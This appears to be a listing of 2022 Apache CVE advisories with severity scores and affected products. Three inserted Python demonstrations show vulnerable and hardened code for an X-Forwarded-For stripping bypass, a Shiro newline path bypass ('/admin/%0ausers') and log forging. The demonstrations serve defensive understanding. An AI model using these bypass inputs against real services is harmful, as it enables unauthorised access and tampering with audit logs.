A stored cross-site scripting (XSS) vulnerability in Apache Spark 3.2.1 and earlier, and 3.3.0, allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the logs which would be returned in logs rendered in the UI.

Products Affected

Vendor Product Version
apache spark 3.3.0
apache spark *
CVE-2022-31778

Improper Input Validation vulnerability in handling the Transfer-Encoding header of Apache Traffic Server allows an attacker to poison the cache. This issue affects Apache Traffic Server 8.0.0 to 9.0.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31779

Improper Input Validation vulnerability in HTTP/2 header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31780

Improper Input Validation vulnerability in HTTP/2 frame handling of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31781

Apache Tapestry up to version 5.8.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles Content Types. Specially crafted Content Types may cause catastrophic backtracking, taking exponential time to complete. Specifically, this concerns the regular expression applied to the parameter of the org.apache.tapestry5.http.ContentType class. Apache Tapestry 5.8.2 has a fix for this vulnerability. Note that the vulnerability cannot be triggered by web requests through Tapestry code alone; it would only occur if some non-Tapestry code path passes outside input to the ContentType class constructor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tapestry *
CVE-2022-31813 HIGH

Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-348,CWE-345,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
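The hop-by-hop mechanism behind the X-Forwarded-* bypass above, as an added example that is not httpd's code. RFC 7230 lets a sender list header names in Connection to mark them hop-by-hop; if a proxy adds X-Forwarded-For and only afterwards strips whatever the client nominated, the client can make the proxy drop its own header. An origin that falls back to the TCP peer address when the header is missing then sees the proxy's internal IP and waves the request through. The header set, the trusted range and the origin's allow-list logic are assumptions.

```python
import ipaddress

TRUSTED_NET = ipaddress.ip_network("10.0.0.0/8")     # assumed internal range


def hop_by_hop(headers: dict) -> set:
    """Header names the client nominated as hop-by-hop via Connection."""
    conn = headers.get("connection", "")
    return {h.strip().lower() for h in conn.split(",") if h.strip()}


def proxy_forward(client_headers: dict, client_ip: str, hardened: bool) -> dict:
    """Build the header set a reverse proxy sends to the origin."""
    h = {k.lower(): v for k, v in client_headers.items()}
    if not hardened:
        # Vulnerable ordering: X-Forwarded-For is added first, then every header
        # the client listed in Connection is stripped as hop-by-hop, ours included.
        h["x-forwarded-for"] = client_ip
        for name in hop_by_hop(h):
            h.pop(name, None)
    else:
        # Hardened: strip client-nominated hop-by-hop headers first, never let the
        # client nominate X-Forwarded-*, and only then add the proxy's own headers.
        for name in hop_by_hop(h):
            if not name.startswith("x-forwarded-"):
                h.pop(name, None)
        h["x-forwarded-for"] = client_ip
    h.pop("connection", None)          # Connection itself never crosses the hop
    return h


def origin_allows(headers: dict, peer_ip: str) -> bool:
    """Origin-side IP allow-list that trusts X-Forwarded-For and falls back to
    the TCP peer (the proxy) when the header is absent: the gap the bypass uses."""
    xff = headers.get("x-forwarded-for")
    client = xff.split(",")[0].strip() if xff else peer_ip
    return ipaddress.ip_address(client) in TRUSTED_NET


if __name__ == "__main__":
    client = {"Host": "app.internal", "Connection": "close, X-Forwarded-For"}
    for mode in (False, True):
        fwd = proxy_forward(client, "203.0.113.5", hardened=mode)
        print("hardened" if mode else "vulnerable", fwd, origin_allows(fwd, "10.0.0.2"))
```

On the origin side the complementary fix is to fail closed: when a request arrives from a known proxy without X-Forwarded-For, treat the client as unknown rather than as the proxy.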
CVE-2022-32287

A relative path traversal vulnerability in a FileUtil class used by the PEAR management component of Apache UIMA allows an attacker to create files outside the designated target directory using carefully crafted ZIP entry names. This issue affects Apache UIMA version 3.3.0 and prior versions. Note that PEAR files should never be installed into a UIMA installation from untrusted sources, because PEAR archives are executable plugins that will be able to perform any actions with the same privileges as the host Java Virtual Machine.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache uimaj *
CVE-2022-32531

The Apache Bookkeeper Java Client (before 4.14.6 and also 4.15.0) does not close the connection to the bookkeeper server when TLS hostname verification fails. This leaves the bookkeeper client vulnerable to a man in the middle attack. The problem affects BookKeeper client prior to versions 4.14.6 and 4.15.1.

Products Affected

Vendor Product Version
apache bookkeeper *
apache bookkeeper 4.15.0
CVE-2022-32532 HIGH

In Apache Shiro before 1.9.1, a RegexRequestMatcher can be misconfigured so that it is bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache shiro *
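Why a `.` in a path rule can be bypassed, as an added example that is not Shiro's code. In Java's Pattern, as in Python's re, `.` does not match a line terminator unless DOTALL is set, so a rule like /admin/.* fails to match /admin/<LF>users once the container hands the filter a decoded path; the request then falls through to the anonymous branch. The rule, the decoding step and the strict variant that rejects control characters outright are assumptions for the demonstration.

```python
import re
import urllib.parse

ADMIN_RULE = r"/admin/.*"     # assumed protected-path rule


def matches_vulnerable(path: str) -> bool:
    """'.' does not match a line terminator, so a path containing one escapes the rule."""
    return re.fullmatch(ADMIN_RULE, path) is not None


def matches_hardened(path: str) -> bool:
    """With DOTALL '.' also matches newlines, so the rule covers the whole path."""
    return re.fullmatch(ADMIN_RULE, path, re.DOTALL) is not None


def decide(raw_request_path: str, matcher) -> str:
    """Authorisation filter: paths that match a protected rule require a login.
    Containers may hand the filter a decoded path, so decode first as they do."""
    path = urllib.parse.unquote(raw_request_path)
    return "login-required" if matcher(path) else "anonymous-ok"


def decide_strict(raw_request_path: str) -> str:
    """Defence in depth: refuse any path carrying control characters outright,
    so the matcher never sees input the rule author did not anticipate."""
    path = urllib.parse.unquote(raw_request_path)
    if re.search(r"[\x00-\x1f\x7f]", path):
        return "reject"
    return "login-required" if matches_hardened(path) else "anonymous-ok"


if __name__ == "__main__":
    for p in ("/admin/users", "/admin/%0ausers"):
        print(p, decide(p, matches_vulnerable), decide(p, matches_hardened), decide_strict(p))
```

The same check should be applied to the path the container actually uses for dispatch; a matcher that sees a different string than the servlet does is bypassable regardless of flags.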
CVE-2022-32533 HIGH

Apache Jetspeed-2 does not sufficiently filter untrusted user input by default leading to a number of issues including XSS, CSRF, XXE, and SSRF. Setting the configuration option "xss.filter.post = true" may mitigate these issues. NOTE: Apache Jetspeed is a dormant project of Apache Portals and no updates will be provided for this issue

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-79,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2022-32549 MEDIUM

Apache Sling Commons Log <= 5.4.0 and Apache Sling API <= 2.25.0 are vulnerable to log injection. The ability to forge logs may allow an attacker to cover tracks by injecting fake logs and potentially corrupt log files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache sling_api *
apache sling_commons_log *
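What log injection looks like to whatever reads the log, and two ways to neutralise it, as an added example that is not Sling's code. A single untrusted value containing a newline becomes two records in a line-oriented log, and the second one is whatever the attacker wrote. Escaping control characters keeps one value on one line; emitting JSON per record removes the ambiguity entirely because the encoder escapes newlines. The record format, timestamps and the forged username are constructed for the demonstration.

```python
import json
import re

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
RECORD = re.compile(r"^(\S+) (\w+) (.*)$")


def neutralize(value: str, max_len: int = 256) -> str:
    """Escape CR, LF and other control characters so one untrusted value can
    neither end the current record nor start a forged one; cap the length too."""
    def esc(m):
        ch = m.group(0)
        return {"\n": "\\n", "\r": "\\r", "\t": "\\t"}.get(ch, "\\x%02x" % ord(ch))
    out = CONTROL.sub(esc, value)
    return out if len(out) <= max_len else out[:max_len] + "...(truncated)"


def text_record(ts: str, level: str, message: str, sanitize: bool) -> str:
    """One line of a plain-text log; sanitize=False is the vulnerable form."""
    return f"{ts} {level} {neutralize(message) if sanitize else message}"


def json_record(ts: str, level: str, fields: dict) -> str:
    """Structured alternative: json.dumps escapes newlines, so a field cannot
    masquerade as a record boundary whatever it contains."""
    return json.dumps({"ts": ts, "level": level, **fields}, ensure_ascii=True)


def parse_text_log(log_text: str) -> list:
    """What a log shipper or SIEM does with the text file: one record per line."""
    records = []
    for line in log_text.splitlines():
        m = RECORD.match(line)
        if m:
            records.append(m.groups())
    return records


if __name__ == "__main__":
    forged = "mallory\n2022-06-01T10:00:01Z INFO login ok user=admin"   # constructed input
    for sanitize in (False, True):
        line = text_record("2022-06-01T10:00:00Z", "WARN", "login failed user=" + forged, sanitize)
        print(sanitize, parse_text_log(line))
    print(json_record("2022-06-01T10:00:00Z", "WARN", {"event": "login failed", "user": forged}))
```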
CVE-2022-32749

Improper Check for Unusual or Exceptional Conditions vulnerability in request handling in Apache Traffic Server allows an attacker to crash the server under certain conditions. This issue affects Apache Traffic Server: from 8.0.0 through 9.1.3.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-33140 MEDIUM

The optional ShellUserGroupProvider in Apache NiFi 1.10.0 to 1.16.2 and Apache NiFi Registry 0.6.0 to 1.16.2 does not neutralize arguments for group resolution commands, allowing injection of operating system commands on Linux and macOS platforms. The ShellUserGroupProvider is not included in the default configuration. Command injection requires ShellUserGroupProvider to be one of the enabled User Group Providers in the Authorizers configuration. Command injection also requires an authenticated user with elevated privileges. Apache NiFi requires an authenticated user with authorization to modify access policies in order to execute the command. Apache NiFi Registry requires an authenticated user with authorization to read user groups in order to execute the command. The resolution removes command formatting based on user-provided arguments.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache nifi_registry *
apache nifi *
CVE-2022-33681

Delayed TLS hostname verification in the Pulsar Java Client and the Pulsar Proxy make each client vulnerable to a man in the middle attack. Connections from the Pulsar Java Client to the Pulsar Broker/Proxy and connections from the Pulsar Proxy to the Pulsar Broker are vulnerable. Authentication data is sent before verifying the server’s TLS certificate matches the hostname, which means authentication data could be exposed to an attacker. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack by providing the client with a cryptographically valid certificate for an unrelated host. Because the client sends authentication data before performing hostname verification, an attacker could gain access to the client’s authentication data. The client eventually closes the connection when it verifies the hostname and identifies the targeted hostname does not match a hostname on the certificate. Because the client eventually closes the connection, the value of the intercepted authentication data depends on the authentication method used by the client. Token based authentication and username/password authentication methods are vulnerable because the authentication data can be used to impersonate the client in a separate session. This issue affects Apache Pulsar Java Client versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33682

TLS hostname verification cannot be enabled in the Pulsar Broker's Java Client, the Pulsar Broker's Java Admin Client, the Pulsar WebSocket Proxy's Java Client, and the Pulsar Proxy's Admin Client leaving intra-cluster connections and geo-replication connections vulnerable to man in the middle attacks, which could leak credentials, configuration data, message data, and any other data sent by these clients. The vulnerability is for both the pulsar+ssl protocol and HTTPS. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack by providing the client with a cryptographically valid certificate for an unrelated host. This issue affects Apache Pulsar Broker, Proxy, and WebSocket Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33683

Apache Pulsar Brokers and Proxies create an internal Pulsar Admin Client that does not verify peer TLS certificates, even when tlsAllowInsecureConnection is disabled via configuration. The Pulsar Admin Client's intra-cluster and geo-replication HTTPS connections are vulnerable to man in the middle attacks, which could leak authentication data, configuration data, and any other data sent by these clients. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack. This issue affects Apache Pulsar Broker and Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33684

The Apache Pulsar C++ Client does not verify peer TLS certificates when making HTTPS calls for the OAuth2.0 Client Credential Flow, even when tlsAllowInsecureConnection is disabled via configuration. This vulnerability allows an attacker to perform a man in the middle attack and intercept and/or modify the GET request that is sent to the ClientCredentialFlow 'issuer url'. The intercepted credentials can be used to acquire authentication data from the OAuth2.0 server to then authenticate with an Apache Pulsar cluster. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack. The Apache Pulsar Python Client wraps the C++ client, so it is also vulnerable in the same way. This issue affects Apache Pulsar C++ Client and Python Client versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0 to 2.10.1; 2.6.4 and earlier. Any users running affected versions of the C++ Client or the Python Client should rotate vulnerable OAuth2.0 credentials, including client_id and client_secret. 2.7 C++ and Python Client users should upgrade to 2.7.5 and rotate vulnerable OAuth2.0 credentials. 2.8 C++ and Python Client users should upgrade to 2.8.4 and rotate vulnerable OAuth2.0 credentials. 2.9 C++ and Python Client users should upgrade to 2.9.3 and rotate vulnerable OAuth2.0 credentials. 2.10 C++ and Python Client users should upgrade to 2.10.2 and rotate vulnerable OAuth2.0 credentials. 3.0 C++ users are unaffected and 3.0 Python Client users will be unaffected when it is released. Any users running the C++ and Python Client for 2.6 or less should upgrade to one of the above patched versions.

Products Affected

Vendor Product Version
apache pulsar *
CVE-2022-33879 LOW

The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.3 LOW CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L 1.8 1.4

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tika *
CVE-2022-33891

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache spark *
CVE-2022-33980 HIGH

Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:
- "script" - execute expressions using the JVM script execution engine (javax.script)
- "dns" - resolve dns records
- "url" - load values from urls, including from remote servers
Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache commons_configuration *
netapp snapcenter -
debian debian_linux 11.0
CVE-2022-34158

A carefully crafted invocation on the Image plugin could trigger a CSRF vulnerability on Apache JSPWiki before 2.11.3, which could allow a group privilege escalation of the attacker's account. Further examination of this issue established that it could also be used to modify the email associated with the attacked account, and then to issue a password reset request from the login page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-34169

The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.

Products Affected

Vendor Product Version
azul zulu 6.47
azul zulu 13.48
oracle jre 17.0.3.1
oracle jre 11.0.15.1
azul zulu 8.62
oracle jre 1.8.0
azul zulu 7.55
oracle graalvm 20.3.6
netapp solidfire -
azul zulu 13.49
apache xalan-java *
oracle jre 1.7.0
netapp cloud_secure_agent -
netapp cloud_insights_acquisition_unit -
azul zulu 15.40
fedoraproject fedora 36
azul zulu 18.32
oracle openjdk 7
oracle openjdk 8
debian debian_linux 10.0
oracle jdk 17.0.3.1
oracle graalvm 21.3.2
azul zulu 15.41
fedoraproject fedora 35
oracle openjdk 18
azul zulu 8.64
azul zulu 17.35
azul zulu 13.50
netapp oncommand_insight -
azul zulu 11.57
netapp 7-mode_transition_tool -
oracle jdk 11.0.15.1
azul zulu 6.49
netapp hci_management_node -
netapp hci_compute_node -
oracle openjdk *
azul zulu 7.56
oracle jdk 1.8.0
azul zulu 8.63
azul zulu 7.54
oracle jdk 18.0.1.1
debian debian_linux 11.0
azul zulu 11.56
netapp active_iq_unified_manager -
azul zulu 11.58
oracle jdk 1.7.0
oracle jre 18.0.1.1
azul zulu 17.36
oracle graalvm 22.1.0
azul zulu 17.34
azul zulu 18.30
azul zulu 15.42
CVE-2022-34271

A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0.

Products Affected

Vendor Product Version
apache atlas *
CVE-2022-34305 MEDIUM

In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing an XSS vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
CVE-2022-34321

Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication. The vulnerable endpoint exposes detailed statistics about live connections, along with the capability to modify the logging level of proxied connections without requiring proper authentication credentials. This issue affects Apache Pulsar versions from 2.6.0 to 2.10.5, from 2.11.0 to 2.11.2, from 3.0.0 to 3.0.1, and 3.1.0. The known risks include exposing sensitive information such as connected client IP and unauthorized logging level manipulation which could lead to a denial-of-service condition by significantly increasing the proxy's logging overhead. When deployed via the Apache Pulsar Helm chart within Kubernetes environments, the actual client IP might not be revealed through the load balancer's default behavior, which typically obscures the original source IP addresses when externalTrafficPolicy is being configured to "Cluster" by default. The /proxy-stats endpoint contains topic level statistics, however, in the default configuration, the topic level statistics aren't known to be exposed. 2.10 Pulsar Proxy users should upgrade to at least 2.10.6. 2.11 Pulsar Proxy users should upgrade to at least 2.11.3. 3.0 Pulsar Proxy users should upgrade to at least 3.0.2. 3.1 Pulsar Proxy users should upgrade to at least 3.1.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. Additionally, it's imperative to recognize that the Apache Pulsar Proxy is not intended for direct exposure to the internet. The architectural design of Pulsar Proxy assumes that it will operate within a secured network environment, safeguarded by appropriate perimeter defenses.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.1.0
CVE-2022-34662

When a logged-in user adds resources to the resource center with a relative path, a path traversal issue can occur; only logged-in users can trigger it. Upgrade to version 3.0.0 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-34870

Apache Geode versions up to 1.15.0 are vulnerable to a Cross-Site Scripting (XSS) via data injection when using Pulse web application to view Region entries.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache geode *
CVE-2022-34916

Apache Flume versions 1.4.0 through 1.10.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

Products Affected

Vendor Product Version
apache flume *
CVE-2022-34917

A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryException and causing denial of service. Example scenarios:
- Kafka cluster without authentication: Any clients able to establish a network connection to a broker can trigger the issue.
- Kafka cluster with SASL authentication: Any clients able to establish a network connection to a broker, without the need for valid SASL credentials, can trigger the issue.
- Kafka cluster with TLS authentication: Only clients able to successfully authenticate via TLS can trigger the issue.
We advise the users to upgrade the Kafka installations to one of the 3.2.3, 3.1.2, 3.0.2, 2.8.2 versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2022-35278

In Apache ActiveMQ Artemis prior to 2.24.0, an attacker could show malicious content and/or redirect users to a malicious URL in the web console by using HTML in the name of an address or queue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2022-35724

It is possible to provide data to be read that leads the reader to loop in cycles endlessly, consuming CPU. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-35741

Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default and the attacker would require that this plugin be enabled to exploit the vulnerability. When the SAML 2.0 plugin is enabled, affected versions of Apache CloudStack could potentially allow the exploitation of XXE vulnerabilities. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, and server-side request forgery (SSRF) on the CloudStack management server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.17.0.0
CVE-2022-36124

It is possible for a Reader to consume memory beyond the allowed constraints and thus lead to out of memory on the system. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-36125

It is possible to crash (panic) an application by providing a corrupted data to be read. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-36127

A vulnerability in Apache SkyWalking NodeJS Agent prior to 0.5.1. The vulnerability will cause NodeJS services that have this agent installed to be unavailable if the OAP is unhealthy and the NodeJS agent can't establish the connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache skywalking_nodejs_agent *
apache skywalking *
CVE-2022-36364

Apache Calcite Avatica JDBC driver creates HTTP client instances based on class names provided via `httpclient_impl` connection property; however, the driver does not verify if the class implements the expected interface before instantiating it, which can lead to code execution loaded via arbitrary classes and in rare cases remote code execution. To exploit the vulnerability: 1) the attacker needs to have privileges to control JDBC connection parameters; 2) and there should be a vulnerable class (constructor with URL parameter and ability to execute code) in the classpath. From Apache Calcite Avatica 1.22.0 onwards, it will be verified that the class implements the expected interface before invoking its constructor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache apache_calcite_avatica *
CVE-2022-36760

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server 2.4 version 2.4.54 and prior versions.

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-37021

Apache Geode versions up to 1.12.5, 1.13.4 and 1.14.0 are vulnerable to a deserialization of untrusted data flaw when using JMX over RMI on Java 8. Any user still on Java 8 who wishes to protect against deserialization attacks involving JMX or RMI should upgrade to Apache Geode 1.15 and Java 11. If upgrading to Java 11 is not possible, then upgrade to Apache Geode 1.15 and specify "--J=-Dgeode.enableGlobalSerialFilter=true" when starting any Locators or Servers. Follow the documentation for details on specifying any user classes that may be serialized/deserialized with the "serializable-object-filter" configuration option. Using a global serial filter will impact performance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache geode 1.14.0
apache geode *
CVE-2022-37022

